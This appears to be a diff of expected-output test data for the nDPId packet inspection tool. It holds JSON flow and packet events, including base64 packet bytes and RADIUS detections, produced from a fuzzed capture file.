00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1528997683490,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997683490,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA\/1AAPsRUM3G4hk1CgysngcUchAAzV+4C2IAxbjeL+gJ\/Z8y3pAVBW+ilI8BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrTG9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6UjE6NyUAMzcvMjI4T0oBAgBIFwEAAAEFAACeTPrzq4G+qMdV63zS5jgKAgUAANMitQR5aAAATi\/4eqBv42KLAQBzCwUAAI3Vpdgp79asxAN0pnzOl99QEuFioroE6q1umxIDXtaj55s="}
00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -238,8 +238,8 @@
01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1528997683835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997683835,"pkt":"AAAMB6xAABRP+4vqCABFAALHIRVAAP8RAAAKDEAexncZNXIQBxQCswAAAWMCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1528997683835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997683835,"pkt":"AAAMB6xAABRP+4vqCABFAALHIRVAAP8RAAAKDEAexncZNXIQBxQCswAAAWMCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997687969,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997687969,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1528997687969,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997687969,"pkt":"ABRP+4rqcNuYVcUnCABFAADhBApAAPwRT8DG4hk1CgxAHgetchAAzW6NC2QAxZQNQW9gM5ZAoOSO4YFP3T0BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEFAABnRC75Yur1ZFj3fN3BeW98AgUAAFegbuvq5gAA\/FNfCuUdMLiLAQACCwUAAJwUGRbAWowbz35Ho4OQS4FQEj0VhwwOXHKZf7fI3xH\/2bM="} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1528997687969,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997687969,"pkt":"ABRP+4rqcNuYVcUnCABFAADhBApAAPwRT8DG4hk1CgxAHgetchAAzW6NC2QAxZQNQW9gM5ZAoOSO4YFP3T0BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEFAABnRC75Yur1ZFj3fN3BeW98AgUAAFegbuvq5gAA\/FNfCuUdMLiLAQACCwUAAJwUGRbAWowbz35Ho4OQS4FQEj0VhwwOXHKZf7fI3xH\/2bM="}
01268{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":185,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2304,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997692462,"pkt":"ACUAB2ugABRP+4rqCQBFAALHIRlAAP8RAAAKDEAexuIZNXIQBxQCswAAAWcCq6p8EPt1JA7lQ+Db9yRaDGkaCgAAV8gOBFVTGnAAAFfIDQZ3aWZpGg8AAFfICSlXSVNQUjEwGgkAADghDQM5NwZbIqc8ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLUkwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAIJASthdWRpdC1zZXNzaW9uLWlkJQAwZmYxMGFjMDIwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQII5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGIQAAAAIMBgAABRQ9Bk0AABNABgAAAA1BBgAAAAZRBDU2TyYCAnEkFwEAAAsFAAB5qZtl7jXBbH7Ivr+LWOj2AwIAIKwexEUaFAAAVsgHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJgwBXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXwB0RVlpXIEMyIFRlc3QgTGFiGgslAFclAAVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWj1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSolQEnRJIAwgdOVHaEimFKQwq+M="} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":185,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2304,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997692462,"pkt":"ACUAB2ugABRP+4rqCQBFAALHIRlAAP8RAAAKDEAexuIZNXIQBxQCswAAAWcCq6p8EPt1JA7lQ+Db9yRaDGkaCgAAV8gOBFVTGnAAAFfIDQZ3aWZpGg8AAFfICSlXSVNQUjEwGgkAADghDQM5NwZbIqc8ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLUkwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAIJASthdWRpdC1zZXNzaW9uLWlkJQAwZmYxMGFjMDIwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQII5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGIQAAAAIMBgAABRQ9Bk0AABNABgAAAA1BBgAAAAZRBDU2TyYCAnEkFwEAAAsFAAB5qZtl7jXBbH7Ivr+LWOj2AwIAIKwexEUaFAAAVsgHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJgwBXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXwB0RVlpXIEMyIFRlc3QgTGFiGgslAFclAAVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWj1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSolQEnRJIAwgdOVHaEimFKQwq+M="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":185,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2304,"global_ts_msec":1528997692784} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":185,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2304,"global_ts_msec":1528997692784}
00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528997764910,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528997764910,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"flow_datalink":1,"flow_max_packets":3}
01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1528997764910,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997764910,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIRtAACUAAAAKDEAexuIZNXIQBxQClwAAAWkCj2WOGagJIQ3h2c\/0kWBqo7IaCgAAV8gOBFVTGgwAalfIyQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqeEATUwMzExNDgwMDcxMzk0MzA0QHdsYW4ubW5jNDgwLm1jY6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1528997764910,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997764910,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIRtAACUAAAAKDEAexuIZNXIQBxQClwAAAWkCj2WOGagJIQ3h2c\/0kWBqo7IaCgAAV8gOBFVTGgwAalfIyQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqeEATUwMzExNDgwMDcxMzk0MzA0QHdsYW4ubW5jNDgwLm1jY6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -260,16 +260,16 @@
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1528997777144,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997777144,"pkt":"AAAMB6xAABRP+4rqCABFAALHISdAAP8RAAAKVCUAxuIZNXIQBxQCswAAAXUCq0+RGyL6qp4kGgBnV02AqO8aCgAAV8gOBFVzGgwAAFfIDQZ3aWZpGg9zAFfICQlXSVNQUjEwGgkAADghDQM3NwZbItKBATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJWwwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmZBMGFjMDAwMDAwYzg4a2E3MjI1YiwgNWIyMmE3OGMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjMxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyZ1AgAkFwEAAAsFAAB4gbzVxbw2lh1ax6mZCkrRAwIAIEu4WjAaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABNyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFBlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghTwYAAOsAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEiPn8\/WrP4cXVwKHtEGPFQc="} 01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1528997777144,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997777144,"pkt":"AAAMB6xAABRP+4rqCABFAALHISdAAP8RAAAKVCUAxuIZNXIQBxQCswAAAXUCq0+RGyL6qp4kGgBnV02AqO8aCgAAV8gOBFVzGgwAAFfIDQZ3aWZpGg9zAFfICQlXSVNQUjEwGgkAADghDQM3NwZbItKBATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJWwwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmZBMGFjMDAwMDAwYzg4a2E3MjI1YiwgNWIyMmE3OGMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjMxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyZ1AgAkFwEAAAsFAAB4gbzVxbw2lh1ax6mZCkrRAwIAIEu4WjAaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABNyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFBlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghTwYAAOsAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEiPn8\/WrP4cXVwKHtEGPFQc="}
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
